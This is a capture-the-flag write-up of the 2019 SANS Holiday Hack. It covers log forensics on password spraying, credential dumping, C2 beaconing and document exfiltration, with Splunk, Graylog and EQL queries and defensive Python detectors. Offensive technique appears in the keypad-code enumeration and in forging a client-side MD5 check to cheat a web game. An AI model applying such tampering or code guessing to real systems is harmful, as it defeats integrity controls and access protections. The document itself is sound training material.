       The CTF starts, the pentest begins, and… what happens, again? Even when we follow the steps we're told, things don't go as expected. A scan won't always give us the answer. An exploit won't run. Our awesome CTF buddy can't make it out to help us. We're running out of time!! What's supposed to happen when we get stuck? We'll borrow some academic wisdom on heuristics and mix it with a hacker's methodology to give your thinking a boost for this year's Holiday Hack, and whatever challenge you've got next. Expect a quick holiday jaunt through problem-solving in a pinch [29]!

 

Santa’s Naughty List:  Holiday Themed Social Engineering – Snow

 

       Get yourself a warm cup of cocoa, cozy up, and join Snow from the North Pole as she discusses tips and tricks on how to elevate Social Engineering assessments during the holiday season! That’s right Q4, the most busy time of the year. Social Engineering assessments types covered will include Phishing, and Physical Security. Warning: these tactics may land you on the naughty list alongside of Hans Gruber, the Wet Bandits, Mr. Oogie Boogie, and many Gremlins [30].

 

Talk Track Room 3:

 

Dashing Through the Logs – James Brodsky

 

       If you want your hunt to be successful, you need to look where the threats are. In modern environments, that means collecting endpoint and email logs and knowing what to search for in it. In this talk, we will cover critical Windows-based security event log sources like Sysmon, PowerShell, and process launch events. Additionally, we will introduce the stoQ automation framework for analyzing email. We’ll show you how to use this data to pragmatically hunt for threats operating in your environment [31].

 

Reversing Crypto the Easy Way – Ron Bowes

 

       Have you ever run into an application that encrypts network traffic or files, and wished you could figure out what's going on? It's not always difficult! Did you know that a made-up 90% of all crypto makes the same few mistakes? And that some of those mistakes are easy to find? By the end of this short presentation, you'll be an expert in finding simple crypto mistakes [23]!

 

Talk Track Room 4:

 

Machine Learning Use Cases for Cyber Security – Chris Davis

 

       In this talk, Chris Davis, discusses many theoretical use cases for machine learning and neural networks for offensive and defensive security. Chris then demonstrates using machine learning for image recognition [21].

 

Web Apps:  A Trailhead – Chris Elgee

 

       Web applications, seen and unseen, dominate our interactions with the Internet. Understanding what they are and the part they play is instrumental to defending organizations online. Let's take a look at an example web application, some vulnerabilities it has, and what we could be doing to strengthen our defenses [32].

 

Talk Track Room 5:

 

Learning to Escape Containers – Ian Coldwater

 

       Containers aren’t magic, and understanding how they work can help you understand how to break them. Let’s learn some Linux low levels, and demonstrate a container escape to put theory into practice [33].

 

Optical Decoding of Keys – Deviant Ollam

 

       While many individuals understand the need to safeguard their keys from strangers, this caution typically comes in the form of

unwillingness to physically hand them to maintenance staff, valet drivers, or someone who "just needs to open a door and then bring the keys right back." However, do you know that equal caution is merited when it comes to people seeing your keys? Believe it or not, but it is possible to use a photograph of a key to reverse-engineer out the bitting data... a series of numbers that can be used to produce a copy, even if you never have the source key in your physical possession. This mini talk will step you through the process... live [34].

 

Talk Track Room 6:

 

Logs? Where we’re going we don’t need logs. – Mark Baggett

 

       It never fails. You show up to do incident response and ask to see your customer's logs. Inevitably the logs either don’t exist or they are missing key pieces of data required for your investigation. What if you could go back in time and capture every process that executed on every host over the last 30 days? What if you could go back in time and see which wired and wireless networks were used and how much data was transferred across them? What if you could go back in time and capture the unique SID of every user that executed levery process even if the attackers deleted the accounts they used? Great news, you can and it doesn't even require 1.21 gigawatts! In this talk I'll show you srum_dump.exe and ese2csv.exe and how you can retrofit any incident with 30 days of historical logs [35].

 

Telling Stories from the North Pole – Dave Kennedy

 

       Phishing organizations is nothing new and companies have continued to focus on perimeter defenses, endpoint visibility, and education of users. This talk applies a new spin on social-engineering knowing that we will be generating alarms to security analysts and building that into the attack. This talk has a walkthrough of a live demonstration circumventing anti-virus products protection methods as well as a story template used for when we get detected, a way to look more legitimate for remote code execution. This talk focuses on offensive capabilities, our next view into the evolution of hacking, and most importantly, what we can do as defenders to get better at what we do [36].


Talk Track Room 7:


5 Steps to Build and Lead a Team of Holly Jolly Hackers – John Hammond


       So your company, your school, or your community wants to "get into cybersecurity." How do you do that? How do you put together a team of people that know and understand that stuff? In this talk, John presents a 5-step plan for building an effective and collaborative cybersecurity team through gamified training programs. It turns out cultivating a team and fostering an environment to encourage growth can be done with simple techniques: it just takes a personal touch to a digital world [37].


Over 90,000:  Ups and Downs of my InfoSec Twitter Journey – Lesley Carhart


One night, Lesley shrugged and decided to try this silly Twitter thing, after all. 10 years and 100,000 followers later, she manages one of the most followed infosec accounts on the site. There have been definite upsides and downsides to having a platform, and she's watched the best and worst days of the hacking and cybersecurity communities over the years. In this talk, she'll talk about lessons she's learned, how social media can be leveraged to do good, and where we go from here in an era of change [38].


When Malware Goes Mobile, Quick Detection is Critical – Heather Mahalik


       In less than 10 minutes, Heather will demonstrate detection of malware on an Android-powered phone. Her easy to follow method also uncovers how the phone became infected in the first place. With this insight, you are empowered to understand and neutralize the threat. The rest is up to the examiner [39].

Chapter 3: Unredacting a Threatening Document

       After listening to all of the fascinating topics and great speakers, I realize that it is time to start getting to the bottom of this turtle dove business.  The next Objective is to Unredact the Threatening Document.  That document I found in the Quad seems to fit the bill.  Let’s see what it says.

       The redaction was quite simple.  It was an image overlay that still allowed the text beneath it to be selected.  After copying and pasting the text into a new document, we get:

       Well, someone is most certainly unhappy.  The Objective Console is looking for the first word in all caps in that redacted letter.  I paste the challenge word DEMAND into the KringleCon console.  Now to move on to Objective 3, where I need to find out who is so angry about Christmas.

Chapter 4:  Windows Log Analysis: Evaluate Attack Outcome

       “We're seeing attacks against the Elf U domain! Using the event log data [40], identify the user account that the attacker compromised using a password spray attack. Bushy Evergreen is hanging out in the train station and may be able to help you out.”  I need to determine whose account was successfully logged into using a password spray attack.  Those are going to be Windows Security Audit Logs and usually Event ID 4625 is a Logon Failure and 4624 is a Logon Success.  Let’s see if there are several failures followed by a success.

       As suspected, there are several failures (4625 Event ID) and then the success (4624) is for supatree.  It looks like supatree is the compromised account.  Entering that into the KringleCon console yields a Success!  I also could have used the DeepBlueCLI that Bushy Evergreen told me about [2,3].  It would have given me all of the usernames that were sprayed against:

Target Usernames: ygoldentrifle esparklesleigh hevergreen Administrator sgreenbells cjinglebuns tcandybaubles bbrandyleaves bevergreen lstripyleaves gchocolatewine ltrufflefig wopenslae mstripysleigh pbrandyberry civysparkles sscarletpie ftwinklestockings cstripyfluff gcandyfluff smullingfluff hcandysnaps mbrandybells twinterfig supatree civypears ygreenpie ftinseltoes smary ttinselbubbles dsparkleleaves

       It also shows that all of the attacks took place on November 19, 2019 around 1:22 PM (13:22), so from there I can just look for a 4624 event around 1:22 PM.  It looks like “supatree” had their account compromised.  This means whoever made that threat is starting to make good on it.  Let’s see what I need to do next.
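One way to automate the triage described above, as an added example that is not part of the original write-up: it groups Security events by source address, flags any source that fails against many distinct accounts inside a short window, and reports which sprayed account then logged on successfully.  The events below are constructed stand-ins for parsed EVTX output (field names follow the Security log's TargetUserName and IpAddress); the threshold and window are my own assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security log events: (TimeCreated, EventID, TargetUserName, IpAddress).
# A real run would take these from an EVTX parser or a Get-WinEvent CSV export.
SAMPLE_EVENTS = [
    ("2019-11-19 13:22:01", 4625, "ygoldentrifle",  "10.0.0.99"),
    ("2019-11-19 13:22:02", 4625, "esparklesleigh", "10.0.0.99"),
    ("2019-11-19 13:22:02", 4625, "hevergreen",     "10.0.0.99"),
    ("2019-11-19 13:22:03", 4625, "Administrator",  "10.0.0.99"),
    ("2019-11-19 13:22:04", 4625, "sgreenbells",    "10.0.0.99"),
    ("2019-11-19 13:22:05", 4625, "cjinglebuns",    "10.0.0.99"),
    ("2019-11-19 13:22:06", 4625, "supatree",       "10.0.0.99"),
    ("2019-11-19 13:22:07", 4625, "civypears",      "10.0.0.99"),
    ("2019-11-19 13:22:09", 4624, "supatree",       "10.0.0.99"),  # the one that got in
    ("2019-11-19 13:23:40", 4624, "bevergreen",     "10.0.0.5"),   # ordinary logon elsewhere
    ("2019-11-19 13:25:10", 4625, "bevergreen",     "10.0.0.5"),   # one mistyped password
]


def parse_time(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def detect_sprays(events, window=timedelta(minutes=5), min_users=5):
    """Return {source_ip: finding} for every source that failed logons against
    at least `min_users` distinct accounts inside `window`, plus any sprayed
    account that then logged on successfully (4624) from the same source."""
    ordered = sorted((parse_time(t), eid, user, ip) for t, eid, user, ip in events)
    failures, successes = defaultdict(list), defaultdict(list)
    for ts, eid, user, ip in ordered:
        if eid == 4625:
            failures[ip].append((ts, user))
        elif eid == 4624:
            successes[ip].append((ts, user))

    findings = {}
    for ip, fails in failures.items():
        for i, (start, _) in enumerate(fails):
            # Distinct accounts this source tried inside the sliding window.
            users = {user for ts, user in fails[i:] if ts - start <= window}
            if len(users) < min_users:
                continue
            compromised = sorted({
                user for ts, user in successes.get(ip, [])
                if start <= ts <= start + 2 * window and user in users
            })
            findings[ip] = {"first_failure": start,
                            "sprayed_users": users,
                            "compromised": compromised}
            break  # one finding per source is enough for triage
    return findings


if __name__ == "__main__":
    for ip, finding in detect_sprays(SAMPLE_EVENTS).items():
        print(f"{ip}: {len(finding['sprayed_users'])} accounts sprayed from "
              f"{finding['first_failure']}, compromised: {finding['compromised'] or 'none'}")
```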

Achievement Unlocked: Windows Log Analysis: Evaluate Attack Outcome - You have completed the Windows Log Analysis: Evaluate Attack Outcome challenge!

Chapter 5:  Windows Log Analysis: Determine Attacker Technique

       “Using these normalized Sysmon logs, identify the tool the attacker used to retrieve domain password hashes from the lsass.exe process. For hints on achieving this objective, please visit Hermey Hall and talk with SugarPlum Mary [41].”  So, we need to find what tool the attacker used to exploit lsass.exe.  No problem.  Let’s take a look at the JSON file.  It looks pretty small.  If I open it in Notepad++ and run a search for lsass.exe, there’s only one instance.  OK.  This is easier than I thought.  What ran right before that? Ntdsutil.exe seems to be our culprit, but I want to verify that with EQL.  If I use eql query -f sysmon-data.json "process where parent_process_name = '*lsass*'" | jq, it confirms there is only one lsass instance.

       That also shows me a Logon_ID of 999 and a Timestamp.  Let’s go a few seconds before that and run eql query -f sysmon-data.json "process where logon_id = 999 and timestamp > 132186398300000000 and timestamp < 132186399000000000" | jq and my output becomes:

       This confirms that ntdsutil.exe was the tool that allowed the attacker to retrieve the domain password hashes.  Entering ntdsutil into the KringleCon console renders a Success and:

Achievement Unlocked: Windows Log Analysis: Determine Attacker Technique – You have completed the Windows Log Analysis: Determine Attacker Technique Challenge!

       Let’s take a look at Objective 5.

Chapter 6:  Network Log Analysis: Determine Compromised System

       “The attacks don't stop! Can you help identify the IP address of the malware-infected system using these Zeek logs? For hints on achieving this objective, please visit the Laboratory and talk with Sparkle Redberry [42].” A malware-infected system needs finding.  Sounds fun.  Malware is traditionally noisy.  Opening the index.html page inside the ELFU folder opens a RITA GUI.  Clicking on Beacons will show what Source IPs have the most connections.  There’s no comparison or doubt that 192.168.134.130 is our infected machine.
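As an added example (not code from the write-up or from RITA), here is the core of what a beacon check does with Zeek conn.log in JSON-lines form: group connections by source/destination pair and flag pairs whose inter-connection timing is unusually regular.  The conn.log records, the 203.0.113.10 destination and the thresholds are constructed for the demonstration.

```python
import json
import statistics
from collections import defaultdict


def make_sample_conn_log():
    """Constructed Zeek conn.log in JSON-lines form (not data from the challenge).
    One host phones home about every 60 s; another browses at irregular gaps."""
    lines = []
    ts = 1574000000.0
    for i in range(20):
        ts += 60 + (i % 3) - 1  # gaps of 59, 60, 61 seconds: tiny jitter
        lines.append(json.dumps({
            "ts": ts, "id.orig_h": "192.168.134.130", "id.resp_h": "203.0.113.10",
            "id.resp_p": 443, "proto": "tcp", "orig_bytes": 312, "resp_bytes": 0}))
    ts = 1574000000.0
    for gap in (3, 40, 7, 900, 12, 260, 5, 60, 33, 410, 2, 75):
        ts += gap
        lines.append(json.dumps({
            "ts": ts, "id.orig_h": "192.168.134.131", "id.resp_h": "198.51.100.7",
            "id.resp_p": 443, "proto": "tcp", "orig_bytes": 1400 + gap, "resp_bytes": 9000}))
    return "\n".join(lines)


def score_beacons(conn_log_text, min_connections=10, max_interval_cv=0.15):
    """Return [(orig_h, resp_h, count, interval_cv)] for source/destination pairs
    with enough connections whose spacing is regular enough to look like a beacon.
    interval_cv is the coefficient of variation (stdev / mean) of the gaps."""
    stamps_by_pair = defaultdict(list)
    for line in conn_log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        stamps_by_pair[(rec["id.orig_h"], rec["id.resp_h"])].append(float(rec["ts"]))

    findings = []
    for (orig, resp), stamps in stamps_by_pair.items():
        if len(stamps) < min_connections:
            continue
        stamps.sort()
        intervals = [later - earlier for earlier, later in zip(stamps, stamps[1:])]
        mean = statistics.mean(intervals)
        cv = statistics.pstdev(intervals) / mean if mean else float("inf")
        if cv <= max_interval_cv:
            findings.append((orig, resp, len(stamps), round(cv, 3)))
    # Most regular talker first, then the busiest.
    return sorted(findings, key=lambda f: (f[3], -f[2]))


if __name__ == "__main__":
    for orig, resp, count, cv in score_beacons(make_sample_conn_log()):
        print(f"{orig} -> {resp}: {count} connections, interval CV {cv}")
```

Real beacons add jitter and vary payload size, so production tools also score byte-size dispersion and connection count; the interval check alone is the part the Beacons view in RITA makes visible.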

Entering 192.168.134.130 completes Objective 5 and provides me with another:


Achievement Unlocked: Network Log Analysis: Determine Compromised System – You have completed the Network Log Analysis: Determine Compromised System challenge!

Chapter 7: Splunk

       “Access https://splunk.elfu.org/ as elf with password elfsocks. What was the message for Kent that the adversary embedded in this attack? The SOC folks at that link will help you along! For hints on achieving this objective, please visit the Laboratory in Hermey Hall and talk with Prof. Banas.”  Thinking back to the conversation that I had with Professor Banas, he said that his system was hacking other systems.  Let me look into this.  After first logging in, there are a series of questions that need to be answered before I can determine what message someone left for Kent. 


Question 1:  What is the short host name of Professor Banas’ computer? 


Answer:  Looking around inside of the different chats, in particular #ELFU SOC, it looks like Zippy Frostington discovered a system called “sweetums” communicating with a weird IP and Alice Bluebird states that sweetums is Professor Banas’ system. 


Question 2:  What is the name of the sensitive file that was likely accessed and copied by the attacker?


Answer:  It looks like it wants the Full Path to the file.  Searching all things cbanas (using index=main cbanas) we find one entry where a .txt file calls into PowerShell with an OutputString call to a Naughty_and_Nice_2019_draft.txt file as the input.  That means PowerShell is trying to copy the contents of that file into something else.  That would make C:\Users\cbanas\Documents\Naughty_and_Nice_2019_draft.txt the likely file that was accessed.

Question 3:  What is the fully-qualified domain name(FQDN) of the command and control(C2) server? 


Answer:  To discover this, I look for any network events in sysmon that involve PowerShell with this query index=main sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational powershell EventCode=3 which yields 159 results, but all to the same destination hostname of 144.202.46.214.vultr.com.  I believe we have found our Command and Control Server.  That search string is looking through Sysmon logs for a PowerShell event with an Event Code of 3 which is the code for Network Connections.

Question 4:  What document is involved with launching the malicious PowerShell code? 


Answer:  I start by searching for all the PowerShell logs with index=main sourcetype="WinEventLog:Microsoft-Windows-Powershell/Operational", but that leads us to over 1000 results.  Let’s look at a 5 second window around the oldest event.  The oldest PowerShell event was August 25, 2019 at 9:18:37:000 AM – Event Time.  So, I use index=main sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational and set the date range to that 10 second window.  That narrows it down to 12 events with only 2 ProcessIDs.  6268 has 8 instances out of 12 and 5864 had the other 4.  Let’s check on the majority.  Convert 6268 into hex and search for new processes starting, or Event Code 4688, with index=main sourcetype=WinEventLog EventCode=4688 process_id=0x187C, making sure you expand the time frame back to all time, and you will see only one event with a Process Command Line: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Windows\Temp\Temp1_Buttercups_HOL404_assignment (002).zip\19th Century Holiday Cheer Assignment.docm" /o "".  That makes the document in question, 19th Century Holiday Cheer Assignment.docm, the culprit.

Question 5:  How many unique email addresses were used to send Holiday Cheer essays to Professor Banas? 


Answer:  To determine this information, I need to look through the stoq logs using index=main sourcetype=stoq | table _time results{}.workers.smtp.to results{}.workers.smtp.from  results{}.workers.smtp.subject results{}.workers.smtp.body | sort - _time.  This produces 42 events.  Logic would state that each message would have 2 instances, send and receive, so there would be 21 unique addresses, but I need to confirm that.  To confirm that, I need to only look at messages going to carl.banas and only those with a subject containing Holiday Cheer Assignment Submission with index=main sourcetype=stoq | table _time results{}.workers.smtp.to results{}.workers.smtp.from  results{}.workers.smtp.subject results{}.workers.smtp.body | search results{}.workers.smtp.subject="*Holiday Cheer Assignment Submission*" results{}.workers.smtp.to="*carl*" and we can confirm that there are 21 unique email addresses sending their essays to Professor Banas.


Question 6:  What was the password for the zip archive that contained the suspicious file? 


Answer:  This one is easy to answer.  Playing off the results from the previous search, we can see that the original message has the password as 123456789.  Alternatively, we could run index=main sourcetype=stoq | table _time results{}.workers.smtp.to results{}.workers.smtp.from  results{}.workers.smtp.subject results{}.workers.smtp.body | search results{}.workers.smtp.body="*password*" to find any reference to a password inside of a message body, but again, hackers are lazy creatures.  Why work harder than I have to?


Question 7:  What email address did the suspicious file come from? 


Answer:  Again, working from the results of the search in Question 5 or the search run in Question 6, I can see the file came from bradly.buttercups@eifu.org or someone pretending to be him.  Notice: I said @e”i”fu.org and not eLfu.org.  This is a case of domain squatting that plays on letter case.  A capital i in most digital environments looks much like a lowercase l (compare Il); if I flip the cases it comes out as iL.  The uppercase I is just a hair shorter than the lowercase l, but without having them next to each other, most people would never notice.
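An added example, not from the write-up: a sender check that folds the case-insensitive domain to a look-alike skeleton (i, I, 1 and | to l; 0 to o; rn to m) before comparing it with the trusted domain, so eifu.org is flagged as a look-alike of elfu.org instead of being accepted as ordinary external mail.  TRUSTED_DOMAINS and the confusable table are assumptions for the demonstration.

```python
import re

# Domains whose mail is expected; an assumption for the demonstration.
TRUSTED_DOMAINS = {"elfu.org"}

# DNS is case-insensitive, so the sender controls how the name is displayed:
# "eifu.org" can be shown as "eIfu.org", and capital I passes for lowercase l.
# Fold every such look-alike to one canonical letter before comparing.  Folding
# i to l is deliberately aggressive: it trades a few false positives for
# catching the case trick described above.
_SINGLE = str.maketrans({"i": "l", "1": "l", "|": "l", "0": "o", "5": "s"})
_PAIRS = (("rn", "m"), ("vv", "w"), ("cl", "d"))


def skeleton(domain):
    """Case-fold a domain and collapse its confusable characters."""
    s = domain.strip().lower().translate(_SINGLE)
    for pair, single in _PAIRS:
        s = s.replace(pair, single)
    return s


def sender_domain(header_value):
    """Pull the address out of a From header such as
    'bradly buttercups <bradly.buttercups@eifu.org>' and return its domain."""
    match = re.search(r"<([^>]+)>", header_value)
    address = match.group(1) if match else header_value.strip()
    if "@" not in address:
        raise ValueError(f"no address in {header_value!r}")
    return address.rsplit("@", 1)[1].lower()


def classify_sender(header_value, trusted=TRUSTED_DOMAINS):
    """Return ('trusted', domain), ('lookalike', impersonated_domain)
    or ('external', None)."""
    domain = sender_domain(header_value)
    if domain in trusted:
        return "trusted", domain
    for good in trusted:
        if skeleton(domain) == skeleton(good):
            return "lookalike", good
    return "external", None


if __name__ == "__main__":
    for sample in ("carl.banas@elfu.org",
                   "bradly buttercups <bradly.buttercups@eifu.org>",
                   "payroll@e1fu.org",
                   "friend@example.com"):
        print(f"{sample!r:50} -> {classify_sender(sample)}")
```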

Primary Objective Question:  What was the message for Kent that the adversary embedded in this attack? 


Answer:  I know the email that started the whole mess was the one from Bradly Buttercups.  Let’s grab that email and extract file metadata out of it using index=main sourcetype=stoq  "results{}.workers.smtp.from"="bradly buttercups <bradly.buttercups@eifu.org>" | eval results = spath(_raw, "results{}")
| mvexpand results
| eval path=spath(results, "archivers.filedir.path"), filename=spath(results, "payload_meta.extra_data.filename"), fullpath=path."/".filename
| search fullpath!=""

I can see 19 file metadata files, one of which is the 19th Century Holiday Cheer Assignment.docm.  When I try to open that assignment document in the File Archive, I am told to open core.xml instead when I get to the folder the doc should be in.  OK.


“Cleaned for your safety. Happy Holidays!

In the real world, this would have been a wonderful artifact for you to investigate, but it had malware in it of course so it's not posted here. Fear not! The core.xml file that was a component of this original macro-enabled Word doc is still in this File Archive thanks to stoQ. Find it and you will be a happy elf :-) “

Navigating to http://elfu-soc.s3-website-us-east-1.amazonaws.com/?prefix=stoQ%20Artifacts/home/ubuntu/archive/f/f/1/e/a/ and opening the file in Notepad++ yields:

       I have found the message: “Kent you are so unfair. And we were going to make you the king of the Winter Carnival.”  I enter that into the KringleCon console.  Achievement Unlocked: Splunk – You have completed the Splunk challenge!  Let’s run back into the Laboratory to tell Professor Banas the news.  “Professor Banas.  Here’s what happened.”  As I run through everything I found during the Splunk objective, the Professor seems to grasp parts of what I’m saying and gloss over other parts.  I’m used to that though.  When I finish explaining he takes a deep breath. “Oh, thanks so much for your help! Sorry I was freaking out. I've got to talk to Kent about using my email again......and picking up my dry cleaning.”  “No problem, Professor.  I’ve got to go.”  It is time to deal with that keypad in the Quad.

Chapter 8:  Get Access to the Steam Tunnels

       I had pretty much helped everyone that I could and completed all of the objectives that I could outside of whatever is in the Dormitory. Well, that and the mysterious crate Kent was talking about.  So, it was time to tackle the keypad.  I head to the Quad and stride up to the elf next to the keypad and ask, “Neville forget the password again?”  “Hey kid, it’s me, Tangle Coalbox. I’m sleuthing again, and I could use your help. Ya see, this here number lock’s been popped by someone. I think I know who, but it’d sure be great if you could open this up for me. I’ve got a few clues for you.


  1. One digit is repeated once.
  2. The code is a prime number.
  3. You can probably tell by looking at the keypad which buttons are used.”
Challenge 7: Frosty Keypad

Challenge URL:  https://keypad.elfu.org/?challenge=keypad

Challenge Objective:  Determine the 4-digit code for the Dormitory

Terminal Start:

       The obvious 3 numbers that are used are 1, 3, and 7.  Well, I am a huge fan of the movie Hackers, even with its complete inaccuracies, but one term that always will endure is calling a hacker elite.  Over the years, that has sometimes been used derogatorily and, for better or worse, has been shortened to leet.  Leet is often represented by the numbers 1337.  It can’t be that easy.  I enter 1337.  Incorrect Code.  It’s never THAT easy.  Well, think backwards.  I enter 7331.  Miraculously, the door unlocks, and I get an Achievement Unlocked: Frosty Keypad – You have completed the Frosty Keypad challenge! alert.  Well, that works.  Let’s see what’s in the Dormitory.
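To see how far the three worn keys and the two clues shrink the keypad's 10,000 possible codes, here is an added example (not part of the original write-up) that enumerates every code using only the worn digits with exactly one digit repeated, and keeps only the primes; the function names are my own.

```python
from itertools import permutations


def is_prime(n):
    """Trial division is plenty for four-digit codes."""
    if n < 2:
        return False
    if n % 2 == 0:
        return n == 2
    d = 3
    while d * d <= n:
        if n % d == 0:
            return False
        d += 2
    return True


def keypad_candidates(worn_digits, length=4):
    """Codes of `length` digits drawn only from the worn keys, in which exactly
    one digit appears twice and every other worn key appears once, kept only
    when the number is prime (the two clues Tangle gives)."""
    worn = sorted(set(worn_digits))
    if len(worn) != length - 1:
        raise ValueError("clues assume exactly one repeated digit among the worn keys")
    codes = set()
    for repeated in worn:
        for perm in permutations(worn + [repeated]):
            code = "".join(str(d) for d in perm)
            if is_prime(int(code)):
                codes.add(code)
    return sorted(codes)


if __name__ == "__main__":
    found = keypad_candidates([1, 3, 7])
    print(f"{len(found)} of 10000 codes survive the clues: {', '.join(found)}")
```

The point for a defender is the size of that surviving list: wear on three keys alone cuts a 4-digit code space to a few dozen guesses before any clue about primes, which is why shared door codes should be changed regularly and use more distinct digits.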
Dormitory


            Upon first entering the dorm, I see a wall of bookshelves on the far wall of the main room with a hallway on either side of that main room.  There’s a snack machine for those late-night study sessions and a refrigerator stocked with enough eggnog to drown a US Naval vessel. In front of the bookshelves is an elf with a long white beard scanning the screen of his laptop with his eyes as if searching for something.  In the hallway to the right of the exit door is an elf with purple hair and a blue ski cap playing on her laptop.  The sounds coming from her laptop reminded me of those old nostalgic 8-bit video games that got me started in IT in the first place.  My heart warmed a bit at that old sound.  I also notice the code to the door written on the wall of the hallway heading to the elf that is playing a game. “Really?  Never write your passwords down people” I thought.

       First things first.  My next objective is to get access to the steam tunnels and there appear to be two challenges here that I can complete.  I head for the bookshelves.  “You seem to be looking for something.  Anything I can do to speed your search along?” I ask.  “It’s me - Pepper Minstix. Normally I’m jollier, but this Graylog has me a bit mystified. Have you used Graylog before? It is a log management system based on Elasticsearch, MongoDB, and Scala. Some Elf U computers were hacked, and I’ve been tasked with performing incident response. Can you help me fill out the incident response report using our instance of Graylog? It’s probably helpful if you know a few things about Graylog. Event IDs and Sysmon are important too. Have you spent time with those? Don’t worry - I’m sure you can figure this all out for me! Click on the All messages Link to access the Graylog search interface! Make sure you are searching in all messages! The Elf U Graylog server has an integrated incident response reporting system. Just mouse-over the box in the lower-right corner. Login with the username elfustudent and password elfustudent.” Pepper seems eager for my help. So, I hop on his terminal to see what I can find.

Challenge 8: Graylog

Challenge URL:  https://incident.elfu.org/

Challenge Objective:  Complete the Incident Report Filing with the correct information from Graylog

Terminal Start:

I am asked to answer 10 questions to complete the incident report [43].


Question 1:  Minty CandyCane reported some weird activity on his computer after he clicked on a link in Firefox for a cookie recipe and downloaded a file. What is the full-path + filename of the first malicious file downloaded by Minty?


Answer:  To find this information, I simply search for a filename containing cookie with TargetFilename:/.+cookie.+/ and am given the result of C:\Users\minty\Downloads\cookie_recipe.exe.

Question 2:  The malicious file downloaded and executed by Minty gave the attacker remote access to his machine. What was the ip:port the malicious file connected to first?


Answer:  I learned earlier that network events have an Event ID of 3 (Chapter 7, Question 3), so let’s search for processes starting from the cookie recipe with an Event ID of 3 using ProcessImage:/.+cookie_recipe.exe/ AND EventID:3, and I see the IP and port are 192.168.247.175:4444

Question 3:  What was the first command executed by the attacker?


Answer:  If I modify the last search to use parent processes with ParentProcessImage:/.+cookie_recipe.+/ we see the first command run is whoami

Question 4:  What is the one-word service name the attacker used to escalate privileges?


Answer:  If I reuse the last search, ParentProcessImage:/.+cookie_recipe.+/ and track by user account I can see the service used to escalate is webexservice

Question 5:  What is the file-path + filename of the binary ran by the attacker to dump credentials?

Answer:  Still reusing the last search, I can see, at the top of the list, the attacker tries to run mimikatz and then runs C:\cookie.exe.  It appears that cookie.exe is that binary that dumped the credentials.

Question 6:  The attacker pivoted to another workstation using credentials gained from Minty's computer. Which account name was used to pivot to another machine?


Answer:  Earlier I learned that a successful logon is Event ID 4624 (Chapter 4) and I know Minty’s source IP is 192.168.247.175.  So, let me search based on that with EventID: 4624 AND SourceNetworkAddress:192.168.247.175 and I see that the attacker logged on with Alabaster’s account.  Poor Mr. Snowball. He can’t win today.

Question 7:  What is the time ( HH:MM:SS ) the attacker makes a Remote Desktop connection to another machine?


Answer:  EventID 4624 is a logon success and a Logon Type 10 is used for RDP (Remote Desktop Protocol). So, let’s use EventID: 4624 AND LogonType:10 and I get only one event at 06:04:28

Question 8:  The attacker navigates the file system of a third host using their Remote Desktop Connection to the second host. What is the SourceHostName,DestinationHostname,LogonType of this connection?


Answer:  We know by looking at that RDP event that the attacker is now on elfu-res-wks2 and is apparently navigating the filesystem of a third host.  There would still need to be a successful logon, so EventID 4624 can still be used.  Let’s look for all 4624’s with elfu-res-wks2 as the source using SourceHostName:"ELFU-RES-WKS2" AND EventID:4624.  Success!  I see 6 events where elfu-res-wks2 connected to elfu-res-wks3 with logon type 3, which is what a UNC path access shows up as.  That makes the challenge answer elfu-res-wks2,elfu-res-wks3,3

Question 9:  What is the full-path + filename of the secret research document after being transferred from the third host to the second host?


Answer:  So, we are technically still on WKS2 grabbing a file on WKS3.  There would be a sysmon file creation event id of 2 with a source of workstation 2. I can also use regex to filter out overly common file paths using something like source:"elfu-res-wks2" AND EventID:2 AND NOT TargetFilename:/.+AppData.+/ AND NOT TargetFilename:/.+updatestore.+/  With that I get only two event results!  The first result is an obvious dead end, but the second yields exactly what I need. C:\Users\alabaster\Desktop\super_secret_elfu_research.pdf 

Question 10:  What is the IPv4 address (as found in logs) the secret research document was exfiltrated to?


Answer:  To find this, I just search for the filename from Question 9 and find a PowerShell Invoke-WebRequest to Pastebin.com.  Now, search based on WKS2 being the Source, Pastebin being the DestinationHostName and an EventID of 3 for Network events using source:"elfu-res-wks2" AND EventID:3 AND DestinationHostname:"pastebin.com" and I am left with only one result that includes a Destination IP of 104.22.3.84

       With that it looks like Pepper’s Incident Report is completed.  I save the report for posterity (D1) and hand the terminal back to Pepper.  “That’s it - hooray! Have you had any luck retrieving scraps of paper from the Elf U server? You might want to look into SQL injection techniques. OWASP is always a good resource for web attacks [44]. For blind SQLi, I’ve heard Sqlmap is a great tool. In certain circumstances though, you need custom tamper scripts to get things going [45]!”


Achievement Unlocked: Graylog – You have completed the Graylog challenge! 


       Let’s see what other bits of fun are in store. As I head down the hallway to the right of the main door, the giggles of glee coming from the purple-haired elf draw my attention.  I hop over to watch her staring intently at her terminal with the focus only video gaming can produce. “What’cha playing?” I inquire.  “Hi! I’m Minty Candycane! I just LOVE this old game! I found it on a 5 1/4 floppy in the attic. You should give it a go! If you get stuck at all, check out this year’s talks. One is about web application penetration testing [32]. Good luck, and don’t get dysentery!”  Thinking back, I do seem to recall a talk from Chris Elgee about Web App Testing.  Let’s see if I can put those skills to work here.  I hop onto the terminal and away I go.

Challenge 9: Holiday Hack Trail

Challenge URL:  https://trail.elfu.org/gameselect/

Challenge Objective:  Make it to the KringleCon before December 25 with everyone alive and try doing it on HARD difficulty.

Terminal Start:

Of course, select HARD for the Difficulty.  Go big or go home, right?  At the purchase screen, since this is likely a dry run, just click buy and you are presented with your first travel screen.

Checking out the code inside the Firefox Dev Tools [10], I come across this juicy piece of coding here with a hash value that is the MD5 of 1626 which is pretty close to the total for my inventory. 

Let’s move forward one day and see what happens.

Well, well.  My distance in the container went to 40, my food dropped to 92 and the hash value changed to 1659.  Interesting.  Let’s put the food back to 100, set the distance to 7999, and change the hash value over to the MD5 of 1626 + 7999 or a330f9fecc388ce67f87b09855480ca3 and then hit Go.

I fell off the trail.  Let’s change those parameters straight from the first day. 

       That worked!  We are successful and are greeted with Achievement Unlocked: Holiday Hack Trail – You have completed the Holiday Hack Trail Challenge!
